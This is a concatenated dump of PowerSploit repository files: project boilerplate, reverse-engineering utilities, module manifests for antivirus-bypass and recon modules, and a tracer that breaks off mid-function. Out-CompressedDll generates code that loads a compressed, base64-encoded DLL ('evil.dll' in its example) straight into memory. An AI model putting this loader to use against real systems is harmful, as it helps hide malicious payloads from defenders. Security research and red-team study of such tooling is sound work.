1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | Header Files 29 | 30 | 31 | Header Files 32 | 33 | 34 | Header Files 35 | 36 | 37 | Header Files 38 | 39 | 40 | Header Files 41 | 42 | 43 | 44 | 45 | Source Files 46 | 47 | 48 | Source Files 49 | 50 | 51 | -------------------------------------------------------------------------------- /ReverseEngineering/Get-ILDisassembly.format.ps1xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | ILInstructionView 6 | 7 | 
IL_INSTRUCTION 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | Position 30 | 31 | 32 | Instruction 33 | 34 | 35 | Operand 36 | 37 | 38 | if ($_.MetadataToken) {"0x$($_.MetadataToken.ToString('X8'))"} 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | -------------------------------------------------------------------------------- /ReverseEngineering/ConvertTo-String.ps1: -------------------------------------------------------------------------------- 1 | filter ConvertTo-String 2 | { 3 | <# 4 | .SYNOPSIS 5 | 6 | Converts the bytes of a file to a string. 7 | 8 | PowerSploit Function: ConvertTo-String 9 | Author: Matthew Graeber (@mattifestation) 10 | License: BSD 3-Clause 11 | Required Dependencies: None 12 | Optional Dependencies: None 13 | 14 | .DESCRIPTION 15 | 16 | ConvertTo-String converts the bytes of a file to a string that has a 17 | 1-to-1 mapping back to the file's original bytes. ConvertTo-String is 18 | useful for performing binary regular expressions. 19 | 20 | .PARAMETER Path 21 | 22 | Specifies the path to the file to convert. 23 | 24 | .EXAMPLE 25 | 26 | PS C:\>$BinaryString = ConvertTo-String C:\Windows\SysWow64\kernel32.dll 27 | PS C:\>$HotpatchableRegex = [Regex] '[\xCC\x90]{5}\x8B\xFF' 28 | PS C:\>$HotpatchableRegex.Matches($BinaryString) 29 | 30 | Description 31 | ----------- 32 | Converts kernel32.dll into a string. A binary regular expression is 33 | then performed on the string searching for a hotpatchable code 34 | sequence - i.e. 5 nop/int3 followed by a mov edi, edi instruction. 35 | 36 | .NOTES 37 | 38 | The intent of ConvertTo-String is not to replicate the functionality 39 | of strings.exe, rather it is intended to be used when 40 | performing regular expressions on binary data. 
41 | 42 | .LINK 43 | 44 | http://www.exploit-monday.com 45 | #> 46 | 47 | [OutputType([String])] 48 | Param ( 49 | [Parameter( Mandatory = $True, 50 | Position = 0, 51 | ValueFromPipeline = $True )] 52 | [ValidateScript({-not (Test-Path $_ -PathType Container)})] 53 | [String] 54 | $Path 55 | ) 56 | 57 | $FileStream = New-Object -TypeName IO.FileStream -ArgumentList (Resolve-Path $Path), 'Open', 'Read' 58 | 59 | # Note: Codepage 28591 returns a 1-to-1 char to byte mapping 60 | $Encoding = [Text.Encoding]::GetEncoding(28591) 61 | 62 | $StreamReader = New-Object IO.StreamReader($FileStream, $Encoding) 63 | 64 | $BinaryText = $StreamReader.ReadToEnd() 65 | 66 | $StreamReader.Close() 67 | $FileStream.Close() 68 | 69 | Write-Output $BinaryText 70 | } 71 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2012 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoExe_MD", "DemoExe_MD\DemoExe_MD.vcxproj", "{F674A5CE-F75F-4035-90AB-46DEBC670282}" 5 | EndProject 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoExe_MDd", "DemoExe_MDd\DemoExe_MDd.vcxproj", "{18FA8A49-4663-4FD8-9F0B-BD489A385A7B}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Win32 = Debug|Win32 11 | Debug|x64 = Debug|x64 12 | Release|Win32 = Release|Win32 13 | Release|x64 = Release|x64 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|Win32.ActiveCfg = Debug|Win32 17 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|Win32.Build.0 = Debug|Win32 18 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|x64.ActiveCfg = Debug|x64 19 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|x64.Build.0 = 
Debug|x64 20 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|Win32.ActiveCfg = Release|Win32 21 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|Win32.Build.0 = Release|Win32 22 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|x64.ActiveCfg = Release|x64 23 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|x64.Build.0 = Release|x64 24 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|Win32.ActiveCfg = Debug|Win32 25 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|Win32.Build.0 = Debug|Win32 26 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|x64.ActiveCfg = Debug|x64 27 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|x64.Build.0 = Debug|x64 28 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|Win32.ActiveCfg = Release|Win32 29 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|Win32.Build.0 = Release|Win32 30 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|x64.ActiveCfg = Release|x64 31 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|x64.Build.0 = Release|x64 32 | EndGlobalSection 33 | GlobalSection(SolutionProperties) = preSolution 34 | HideSolutionNode = FALSE 35 | EndGlobalSection 36 | EndGlobal 37 | -------------------------------------------------------------------------------- /Exfiltration/LogonUser/LogonUser/logon/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | DYNAMIC LINK LIBRARY : logon Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this logon DLL for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your logon application. 9 | 10 | 11 | logon.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 
13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | logon.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | logon.cpp 25 | This is the main DLL source file. 26 | 27 | When created, this DLL does not export any symbols. As a result, it 28 | will not produce a .lib file when it is built. If you wish this project 29 | to be a project dependency of some other project, you will either need to 30 | add code to export some symbols from the DLL so that an export library 31 | will be produced, or you can set the Ignore Input Library property to Yes 32 | on the General propert page of the Linker folder in the project's Property 33 | Pages dialog box. 34 | 35 | ///////////////////////////////////////////////////////////////////////////// 36 | Other standard files: 37 | 38 | StdAfx.h, StdAfx.cpp 39 | These files are used to build a precompiled header (PCH) file 40 | named logon.pch and a precompiled types file named StdAfx.obj. 41 | 42 | ///////////////////////////////////////////////////////////////////////////// 43 | Other notes: 44 | 45 | AppWizard uses "TODO:" comments to indicate parts of the source code you 46 | should add to or customize. 
47 | 48 | ///////////////////////////////////////////////////////////////////////////// 49 | -------------------------------------------------------------------------------- /Exfiltration/NTFSParser/NTFSParserDLL/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | DYNAMIC LINK LIBRARY : NTFSParserDLL Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this NTFSParserDLL DLL for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your NTFSParserDLL application. 9 | 10 | 11 | NTFSParserDLL.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | NTFSParserDLL.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | NTFSParserDLL.cpp 25 | This is the main DLL source file. 26 | 27 | When created, this DLL does not export any symbols. As a result, it 28 | will not produce a .lib file when it is built. 
If you wish this project 29 | to be a project dependency of some other project, you will either need to 30 | add code to export some symbols from the DLL so that an export library 31 | will be produced, or you can set the Ignore Input Library property to Yes 32 | on the General propert page of the Linker folder in the project's Property 33 | Pages dialog box. 34 | 35 | ///////////////////////////////////////////////////////////////////////////// 36 | Other standard files: 37 | 38 | StdAfx.h, StdAfx.cpp 39 | These files are used to build a precompiled header (PCH) file 40 | named NTFSParserDLL.pch and a precompiled types file named StdAfx.obj. 41 | 42 | ///////////////////////////////////////////////////////////////////////////// 43 | Other notes: 44 | 45 | AppWizard uses "TODO:" comments to indicate parts of the source code you 46 | should add to or customize. 47 | 48 | ///////////////////////////////////////////////////////////////////////////// 49 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | DYNAMIC LINK LIBRARY : DemoDLL_RemoteProcess Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this DemoDLL_RemoteProcess DLL for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your DemoDLL_RemoteProcess application. 9 | 10 | 11 | DemoDLL_RemoteProcess.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 
13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | DemoDLL_RemoteProcess.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | DemoDLL_RemoteProcess.cpp 25 | This is the main DLL source file. 26 | 27 | When created, this DLL does not export any symbols. As a result, it 28 | will not produce a .lib file when it is built. If you wish this project 29 | to be a project dependency of some other project, you will either need to 30 | add code to export some symbols from the DLL so that an export library 31 | will be produced, or you can set the Ignore Input Library property to Yes 32 | on the General property page of the Linker folder in the project's Property 33 | Pages dialog box. 34 | 35 | ///////////////////////////////////////////////////////////////////////////// 36 | Other standard files: 37 | 38 | StdAfx.h, StdAfx.cpp 39 | These files are used to build a precompiled header (PCH) file 40 | named DemoDLL_RemoteProcess.pch and a precompiled types file named StdAfx.obj. 41 | 42 | ///////////////////////////////////////////////////////////////////////////// 43 | Other notes: 44 | 45 | AppWizard uses "TODO:" comments to indicate parts of the source code you 46 | should add to or customize. 
47 | 48 | ///////////////////////////////////////////////////////////////////////////// 49 | -------------------------------------------------------------------------------- /ReverseEngineering/New-Object.ps1: -------------------------------------------------------------------------------- 1 | function New-Object 2 | { 3 | [CmdletBinding(DefaultParameterSetName='Net')] 4 | param( 5 | [Parameter(ParameterSetName='Net', Mandatory=$true, Position=0)] 6 | [string] 7 | ${TypeName}, 8 | 9 | [Parameter(ParameterSetName='Com', Mandatory=$true, Position=0)] 10 | [string] 11 | ${ComObject}, 12 | 13 | [Parameter(ParameterSetName='Net', Position=1)] 14 | [Alias('Args')] 15 | [System.Object[]] 16 | ${ArgumentList}, 17 | 18 | [Parameter(ParameterSetName='Com')] 19 | [switch] 20 | ${Strict}, 21 | 22 | [System.Collections.IDictionary] 23 | ${Property}) 24 | 25 | begin 26 | { 27 | Set-StrictMode -Version 2 28 | 29 | try { 30 | $outBuffer = $null 31 | if ($PSBoundParameters.TryGetValue('OutBuffer', [ref]$outBuffer)) 32 | { 33 | $PSBoundParameters['OutBuffer'] = 1 34 | } 35 | 36 | $ClsidPresent = $true 37 | $Guid = [Guid]::NewGuid() 38 | 39 | try 40 | { 41 | $Guid = [Guid] $PSBoundParameters['ComObject'] 42 | } 43 | catch 44 | { 45 | $ClsidPresent = $false 46 | 47 | $wrappedCmd = $ExecutionContext.InvokeCommand.GetCommand('New-Object', [System.Management.Automation.CommandTypes]::Cmdlet) 48 | $scriptCmd = {& $wrappedCmd @PSBoundParameters } 49 | $steppablePipeline = $scriptCmd.GetSteppablePipeline($myInvocation.CommandOrigin) 50 | $steppablePipeline.Begin($PSCmdlet) 51 | } 52 | } catch { 53 | throw 54 | } 55 | } 56 | 57 | process 58 | { 59 | if ($ClsidPresent) 60 | { 61 | [Activator]::CreateInstance([Type]::GetTypeFromCLSID($Guid), $Property) 62 | } 63 | else 64 | { 65 | try { 66 | $steppablePipeline.Process($_) 67 | } catch { 68 | throw 69 | } 70 | } 71 | } 72 | 73 | end 74 | { 75 | if (!$ClsidPresent) 76 | { 77 | try { 78 | $steppablePipeline.End() 79 | } catch { 80 | throw 81 | } 
82 | } 83 | } 84 | <# 85 | 86 | .ForwardHelpTargetName New-Object 87 | .ForwardHelpCategory Cmdlet 88 | 89 | #> 90 | } 91 | -------------------------------------------------------------------------------- /ScriptModification/Out-CompressedDll.ps1: -------------------------------------------------------------------------------- 1 | function Out-CompressedDll 2 | { 3 | <# 4 | .SYNOPSIS 5 | 6 | Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory. 7 | 8 | PowerSploit Function: Out-CompressedDll 9 | Author: Matthew Graeber (@mattifestation) 10 | License: BSD 3-Clause 11 | Required Dependencies: None 12 | Optional Dependencies: None 13 | 14 | .DESCRIPTION 15 | 16 | Out-CompressedDll outputs code that loads a compressed representation of a managed dll in memory as a byte array. 17 | 18 | .PARAMETER FilePath 19 | 20 | Specifies the path to a managed executable. 21 | 22 | .EXAMPLE 23 | 24 | C:\PS> Out-CompressedDll -FilePath evil.dll 25 | 26 | Description 27 | ----------- 28 | Compresses, base64 encodes, and outputs the code required to load evil.dll in memory. 29 | 30 | .NOTES 31 | 32 | Only pure MSIL-based dlls can be loaded using this technique. Native or IJW ('it just works' - mixed-mode) dlls will not load. 33 | 34 | .LINK 35 | 36 | http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html 37 | #> 38 | 39 | [CmdletBinding()] Param ( 40 | [Parameter(Mandatory = $True)] 41 | [String] 42 | $FilePath 43 | ) 44 | 45 | $Path = Resolve-Path $FilePath 46 | 47 | if (! [IO.File]::Exists($Path)) 48 | { 49 | Throw "$Path does not exist." 50 | } 51 | 52 | $FileBytes = [System.IO.File]::ReadAllBytes($Path) 53 | 54 | if (($FileBytes[0..1] | % {[Char]$_}) -join '' -cne 'MZ') 55 | { 56 | Throw "$Path is not a valid executable." 
57 | } 58 | 59 | $Length = $FileBytes.Length 60 | $CompressedStream = New-Object IO.MemoryStream 61 | $DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress) 62 | $DeflateStream.Write($FileBytes, 0, $FileBytes.Length) 63 | $DeflateStream.Dispose() 64 | $CompressedFileBytes = $CompressedStream.ToArray() 65 | $CompressedStream.Dispose() 66 | $EncodedCompressedFile = [Convert]::ToBase64String($CompressedFileBytes) 67 | 68 | Write-Verbose "Compression ratio: $(($EncodedCompressedFile.Length/$FileBytes.Length).ToString('#%'))" 69 | 70 | $Output = @" 71 | `$EncodedCompressedFile = @' 72 | $EncodedCompressedFile 73 | '@ 74 | `$DeflatedStream = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(`$EncodedCompressedFile),[IO.Compression.CompressionMode]::Decompress) 75 | `$UncompressedFileBytes = New-Object Byte[]($Length) 76 | `$DeflatedStream.Read(`$UncompressedFileBytes, 0, $Length) | Out-Null 77 | [Reflection.Assembly]::Load(`$UncompressedFileBytes) 78 | "@ 79 | 80 | Write-Output $Output 81 | } 82 | -------------------------------------------------------------------------------- /ReverseEngineering/Get-Entropy.ps1: -------------------------------------------------------------------------------- 1 | function Get-Entropy 2 | { 3 | <# 4 | .SYNOPSIS 5 | 6 | Calculates the entropy of a file or byte array. 7 | 8 | PowerSploit Function: Get-Entropy 9 | Author: Matthew Graeber (@mattifestation) 10 | License: BSD 3-Clause 11 | Required Dependencies: None 12 | Optional Dependencies: None 13 | 14 | .PARAMETER ByteArray 15 | 16 | Specifies the byte array containing the data from which entropy will be calculated. 17 | 18 | .PARAMETER FilePath 19 | 20 | Specifies the path to the input file from which entropy will be calculated. 
21 | 22 | .EXAMPLE 23 | 24 | C:\PS>Get-Entropy -FilePath C:\Windows\System32\kernel32.dll 25 | 26 | .EXAMPLE 27 | 28 | C:\PS>ls C:\Windows\System32\*.dll | % { Get-Entropy -FilePath $_ } 29 | 30 | .EXAMPLE 31 | 32 | C:\PS>$RandArray = New-Object Byte[](10000) 33 | C:\PS>foreach ($Offset in 0..9999) { $RandArray[$Offset] = [Byte] (Get-Random -Min 0 -Max 256) } 34 | C:\PS>$RandArray | Get-Entropy 35 | 36 | Description 37 | ----------- 38 | Calculates the entropy of a large array containing random bytes. 39 | 40 | .EXAMPLE 41 | 42 | C:\PS> 0..255 | Get-Entropy 43 | 44 | Description 45 | ----------- 46 | Calculates the entropy of 0-255. This should equal exactly 8. 47 | 48 | .OUTPUTS 49 | 50 | System.Double 51 | 52 | Get-Entropy outputs a double representing the entropy of the byte array. 53 | 54 | .LINK 55 | 56 | http://www.exploit-monday.com 57 | #> 58 | 59 | [CmdletBinding()] Param ( 60 | [Parameter(Mandatory = $True, Position = 0, ValueFromPipeline = $True, ParameterSetName = 'Bytes')] 61 | [ValidateNotNullOrEmpty()] 62 | [Byte[]] 63 | $ByteArray, 64 | 65 | [Parameter(Mandatory = $True, Position = 0, ParameterSetName = 'File')] 66 | [ValidateNotNullOrEmpty()] 67 | [IO.FileInfo] 68 | $FilePath 69 | ) 70 | 71 | BEGIN 72 | { 73 | $FrequencyTable = @{} 74 | $ByteArrayLength = 0 75 | } 76 | 77 | PROCESS 78 | { 79 | if ($PsCmdlet.ParameterSetName -eq 'File') 80 | { 81 | $ByteArray = [IO.File]::ReadAllBytes($FilePath.FullName) 82 | } 83 | 84 | foreach ($Byte in $ByteArray) 85 | { 86 | $FrequencyTable[$Byte]++ 87 | $ByteArrayLength++ 88 | } 89 | } 90 | 91 | END 92 | { 93 | $Entropy = 0.0 94 | 95 | foreach ($Byte in 0..255) 96 | { 97 | $ByteProbability = ([Double] $FrequencyTable[[Byte]$Byte]) / $ByteArrayLength 98 | if ($ByteProbability -gt 0) 99 | { 100 | $Entropy += -$ByteProbability * [Math]::Log($ByteProbability, 2) 101 | } 102 | } 103 | 104 | Write-Output $Entropy 105 | } 106 | } -------------------------------------------------------------------------------- 
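/ReverseEngineering/Get-Strings.ps1:
--------------------------------------------------------------------------------
function Get-Strings
{
<#
.SYNOPSIS

Gets strings from a file.

PowerSploit Function: Get-Strings
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

.DESCRIPTION

The Get-Strings cmdlet returns strings (Unicode and/or Ascii) from a file. This cmdlet is useful for dumping strings from binary files and was designed to replicate the functionality of strings.exe from Sysinternals.

Strings are emitted per file, in file order: for each file the Unicode matches are written first, followed by the Ascii matches. Results never carry over from one file to the next.

.PARAMETER Path

Specifies the path to an item.

.PARAMETER Encoding

Specifies the file encoding. The default value returns both Unicode and Ascii.

.PARAMETER MinimumLength

Specifies the minimum length string to return. The default string length is 3.

.EXAMPLE

C:\PS> Get-Strings C:\Windows\System32\calc.exe

Description
-----------
Dump Unicode and Ascii strings of calc.exe.

.EXAMPLE

C:\PS> Get-ChildItem C:\Windows\System32\*.dll | Get-Strings -MinimumLength 12 -Encoding Ascii

Description
-----------
Dumps Ascii strings of at least length 12 of every dll located in C:\Windows\System32.

.OUTPUTS

System.String

One string per match, written to the pipeline.

.NOTES

This cmdlet was designed to intentionally use only PowerShell cmdlets (no .NET methods) in order to be compatible with PowerShell on Windows RT (or any ConstrainedLanguage runspace).

.LINK

http://www.exploit-monday.com
#>

    Param
    (
        [Parameter(Position = 1, Mandatory = $True, ValueFromPipelineByPropertyName = $True)]
        [ValidateNotNullOrEmpty()]
        [ValidateScript({Test-Path $_ -PathType 'Leaf'})]
        [String[]]
        [Alias('PSPath')]
        $Path,

        [ValidateSet('Default','Ascii','Unicode')]
        [String]
        $Encoding = 'Default',

        [UInt32]
        $MinimumLength = 3
    )

    BEGIN
    {
        # Runs of printable characters of at least MinimumLength. Built once here
        # instead of once per file; MinimumLength cannot change mid-pipeline.
        $UnicodeRegex = [Regex] "[\u0020-\u007E]{$MinimumLength,}"
        $AsciiRegex = [Regex] "[\x20-\x7E]{$MinimumLength,}"
    }
    PROCESS
    {
        foreach ($File in $Path)
        {
            # Each file is scanned independently. Previously a single $Results variable
            # accumulated across files (duplicating earlier files' strings) and the Ascii
            # branch overwrote the Unicode matches, so 'Default' only ever returned Ascii.
            if ($Encoding -eq 'Unicode' -or $Encoding -eq 'Default')
            {
                # Get-Content yields one element per line. Join them with a newline rather
                # than the implicit $OFS space so a printable run cannot bridge a line break
                # and be reported as one string. An empty file joins to '' and yields nothing.
                $UnicodeFileContents = (Get-Content -Encoding 'Unicode' $File) -join "`n"
                $UnicodeRegex.Matches($UnicodeFileContents) | ForEach-Object { Write-Output $_.Value }
            }

            if ($Encoding -eq 'Ascii' -or $Encoding -eq 'Default')
            {
                # UTF7 is kept from the original implementation as the "Ascii" decoder.
                $AsciiFileContents = (Get-Content -Encoding 'UTF7' $File) -join "`n"
                $AsciiRegex.Matches($AsciiFileContents) | ForEach-Object { Write-Output $_.Value }
            }
        }
    }
    END {}
}
--------------------------------------------------------------------------------
/AntivirusBypass/AntivirusBypass.psd1:
--------------------------------------------------------------------------------
1 | @{
2 | 
3 | # Script module or binary module file associated with this manifest.
4 | ModuleToProcess = 'AntivirusBypass.psm1'
5 | 
6 | # Version number of this module.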
7 | ModuleVersion = '1.0.0.0' 8 | 9 | # ID used to uniquely identify this module 10 | GUID = '7cf9de61-2bfc-41b4-a397-9d7cf3a8e66b' 11 | 12 | # Author of this module 13 | Author = 'Matthew Graeber' 14 | 15 | # Company or vendor of this module 16 | CompanyName = '' 17 | 18 | # Copyright statement for this module 19 | Copyright = 'BSD 3-Clause' 20 | 21 | # Description of the functionality provided by this module 22 | Description = 'PowerSploit Antivirus Avoidance/Bypass Module' 23 | 24 | # Minimum version of the Windows PowerShell engine required by this module 25 | PowerShellVersion = '2.0' 26 | 27 | # Name of the Windows PowerShell host required by this module 28 | # PowerShellHostName = '' 29 | 30 | # Minimum version of the Windows PowerShell host required by this module 31 | # PowerShellHostVersion = '' 32 | 33 | # Minimum version of the .NET Framework required by this module 34 | # DotNetFrameworkVersion = '' 35 | 36 | # Minimum version of the common language runtime (CLR) required by this module 37 | # CLRVersion = '' 38 | 39 | # Processor architecture (None, X86, Amd64) required by this module 40 | # ProcessorArchitecture = '' 41 | 42 | # Modules that must be imported into the global environment prior to importing this module 43 | # RequiredModules = @() 44 | 45 | # Assemblies that must be loaded prior to importing this module 46 | # RequiredAssemblies = @() 47 | 48 | # Script files (.ps1) that are run in the caller's environment prior to importing this module. 
49 | # ScriptsToProcess = '' 50 | 51 | # Type files (.ps1xml) to be loaded when importing this module 52 | # TypesToProcess = @() 53 | 54 | # Format files (.ps1xml) to be loaded when importing this module 55 | # FormatsToProcess = @() 56 | 57 | # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess 58 | # NestedModules = @() 59 | 60 | # Functions to export from this module 61 | FunctionsToExport = '*' 62 | 63 | # Cmdlets to export from this module 64 | CmdletsToExport = '*' 65 | 66 | # Variables to export from this module 67 | VariablesToExport = '' 68 | 69 | # Aliases to export from this module 70 | AliasesToExport = '' 71 | 72 | # List of all modules packaged with this module. 73 | ModuleList = @(@{ModuleName = 'AntivirusBypass'; ModuleVersion = '1.0.0.0'; GUID = '7cf9de61-2bfc-41b4-a397-9d7cf3a8e66b'}) 74 | 75 | # List of all files packaged with this module 76 | FileList = 'AntivirusBypass.psm1', 'AntivirusBypass.psd1', 'Find-AVSignature.ps1', 'Usage.md' 77 | 78 | # Private data to pass to the module specified in RootModule/ModuleToProcess 79 | # PrivateData = '' 80 | 81 | # HelpInfo URI of this module 82 | # HelpInfoURI = '' 83 | 84 | # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. 85 | # DefaultCommandPrefix = '' 86 | 87 | } 88 | -------------------------------------------------------------------------------- /Recon/Recon.psd1: -------------------------------------------------------------------------------- 1 | @{ 2 | 3 | # Script module or binary module file associated with this manifest. 4 | ModuleToProcess = 'Recon.psm1' 5 | 6 | # Version number of this module. 
7 | ModuleVersion = '1.0.0.0' 8 | 9 | # ID used to uniquely identify this module 10 | GUID = '7e775ad6-cd3d-4a93-b788-da067274c877' 11 | 12 | # Author of this module 13 | Author = 'Matthew Graeber' 14 | 15 | # Company or vendor of this module 16 | CompanyName = '' 17 | 18 | # Copyright statement for this module 19 | Copyright = 'BSD 3-Clause' 20 | 21 | # Description of the functionality provided by this module 22 | Description = 'PowerSploit Reconnaissance Module' 23 | 24 | # Minimum version of the Windows PowerShell engine required by this module 25 | PowerShellVersion = '2.0' 26 | 27 | # Name of the Windows PowerShell host required by this module 28 | # PowerShellHostName = '' 29 | 30 | # Minimum version of the Windows PowerShell host required by this module 31 | # PowerShellHostVersion = '' 32 | 33 | # Minimum version of the .NET Framework required by this module 34 | # DotNetFrameworkVersion = '' 35 | 36 | # Minimum version of the common language runtime (CLR) required by this module 37 | # CLRVersion = '' 38 | 39 | # Processor architecture (None, X86, Amd64) required by this module 40 | # ProcessorArchitecture = '' 41 | 42 | # Modules that must be imported into the global environment prior to importing this module 43 | # RequiredModules = @() 44 | 45 | # Assemblies that must be loaded prior to importing this module 46 | # RequiredAssemblies = @() 47 | 48 | # Script files (.ps1) that are run in the caller's environment prior to importing this module. 
49 | # ScriptsToProcess = '' 50 | 51 | # Type files (.ps1xml) to be loaded when importing this module 52 | # TypesToProcess = @() 53 | 54 | # Format files (.ps1xml) to be loaded when importing this module 55 | # FormatsToProcess = @() 56 | 57 | # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess 58 | # NestedModules = @() 59 | 60 | # Functions to export from this module 61 | FunctionsToExport = '*' 62 | 63 | # Cmdlets to export from this module 64 | CmdletsToExport = '*' 65 | 66 | # Variables to export from this module 67 | VariablesToExport = '' 68 | 69 | # Aliases to export from this module 70 | AliasesToExport = '' 71 | 72 | # List of all modules packaged with this module. 73 | ModuleList = @(@{ModuleName = 'Recon'; ModuleVersion = '1.0.0.0'; GUID = '7e775ad6-cd3d-4a93-b788-da067274c877'}) 74 | 75 | # List of all files packaged with this module 76 | FileList = 'Recon.psm1', 'Recon.psd1', 'Get-HttpStatus.ps1', 'Invoke-ReverseDnsLookup.ps1', 77 | 'Invoke-Portscan.ps1', 'Usage.md' 78 | 79 | # Private data to pass to the module specified in RootModule/ModuleToProcess 80 | # PrivateData = '' 81 | 82 | # HelpInfo URI of this module 83 | # HelpInfoURI = '' 84 | 85 | # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. 
86 | # DefaultCommandPrefix = ''
87 | 
88 | }
89 | 
--------------------------------------------------------------------------------
/ReverseEngineering/ProcessModuleTrace.ps1:
--------------------------------------------------------------------------------
function Register-ProcessModuleTrace
{
<#
.SYNOPSIS

Starts a trace of loaded process modules

PowerSploit Function: Register-ProcessModuleTrace
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

.DESCRIPTION

Subscribes to the Win32_ModuleLoadTrace WMI event under the source identifier 'ModuleLoaded'.
Every module load observed while the subscription is active is turned into a LOADED_MODULE
object (TimeCreated, ProcessId, FileName, ImageBase, ImageSize) that Get-ProcessModuleTrace
reads back. The function refuses to run unless the current session is elevated.

.OUTPUTS

System.Management.Automation.PSEventJob

If desired, you can manipulate the event returned with the *-Event cmdlets.

.LINK

http://www.exploit-monday.com/
#>

    [CmdletBinding()] Param ()

    # Fail early with a clear message: the trace is only allowed from an elevated session.
    $CurrentIdentity = [Security.Principal.WindowsIdentity]::GetCurrent()
    $CurrentPrincipal = [Security.Principal.WindowsPrincipal] $CurrentIdentity
    $AdminRole = [Security.Principal.WindowsBuiltInRole] 'Administrator'

    if (-not $CurrentPrincipal.IsInRole($AdminRole))
    {
        throw 'You must run this cmdlet from an elevated PowerShell session.'
    }

    # Runs once per Win32_ModuleLoadTrace event; whatever it emits is collected on the
    # subscriber's action job and surfaced by Get-ProcessModuleTrace.
    $ModuleLoadedAction = {
        $LoadEvent = $EventArgs.NewEvent

        $ModuleObject = New-Object PSObject -Property @{
            # TIME_CREATED is a FILETIME value; convert it to a local DateTime.
            TimeCreated = [DateTime]::FromFileTime($LoadEvent.TIME_CREATED)
            ProcessId   = $LoadEvent.ProcessId
